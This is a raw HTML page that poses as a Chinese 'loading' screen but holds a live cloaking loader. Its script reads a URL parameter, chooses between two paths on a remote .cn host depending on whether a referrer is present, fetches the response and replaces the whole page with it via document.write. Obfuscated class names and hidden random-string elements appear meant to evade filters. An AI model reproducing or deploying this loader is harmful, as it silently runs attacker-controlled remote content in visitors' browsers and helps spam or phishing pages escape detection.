<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .YE8t4q1P84 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .YE8t4q1P84 .SfFGcPah {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .YE8t4q1P84 .content {
            line-height: 50px;
            text-align: center
        }

        .YE8t4q1P84 .img {
            width: 100%
        }

        .YE8t4q1P84 .MFqBdK2Is {
            text-align: center
        }

        .YE8t4q1P84 .MFqBdK2Is span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .YE8t4q1P84 .MFqBdK2Is span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .YE8t4q1P84 .MFqBdK2Is span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .YE8t4q1P84 .MFqBdK2Is span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .YE8t4q1P84 .MFqBdK2Is span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .YE8t4q1P84 .MFqBdK2Is span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .YE8t4q1P84 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function Lv6bbVXFOq6cH(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Pikiv5K = Lv6bbVXFOq6cH('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Pikiv5K +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Pikiv5K +".html?a=share";
		}
		
        TYQV0tbR=url+"#"+new Date().getTime();
        TYQV0tbR && function() {
            $.get(TYQV0tbR, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<ul style='display:none' >qTlAyOmJYcM7N</ul>
<a  href='#' style='display:none'>QQqq9UrPVAqcY30BIkqqaxKpjGHY5mRNvgY93mySUGOVY1uv76gTIbWuNUZh7vPbNYJ547CLTUw09</a>
<a  href='#' style='display:none'>QQqq9UrPVAqcY30BIkqqaxKpjGHY5mRNvgY93mySUGOVY1uv76gTIbWuNUZh7vPbNYJ547CLTUw09</a>
<b style='display:none' >KNTlzUCKm0T0qfWwpzzIyROc7OvEuU6iXPFfP2I9F5V1D5pR7IAMRirdkBN6JmiCFIn3FhUTOnN607a3maueb</b><div class="YE8t4q1P84">
    <div class="SfFGcPah">
        <div class="MFqBdK2Is">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >JT7qaedupU36LiVFZmi6Jc1HH6u5XmPsejXDwt3ZNg</ul>
<li style='display:none' >AkN1pBc5niZpmGpHBWMe2WlhyBz1hLZ323vxsc0KIyQvYb558ZEtqMRYMJ8ZZr1cZoqwDhQXN2QyGhiKwMiGzHhjDAxo</li>
<ul style='display:none' >JT7qaedupU36LiVFZmi6Jc1HH6u5XmPsejXDwt3ZNg</ul>
<li style='display:none' >AkN1pBc5niZpmGpHBWMe2WlhyBz1hLZ323vxsc0KIyQvYb558ZEtqMRYMJ8ZZr1cZoqwDhQXN2QyGhiKwMiGzHhjDAxo</li></body>
</html>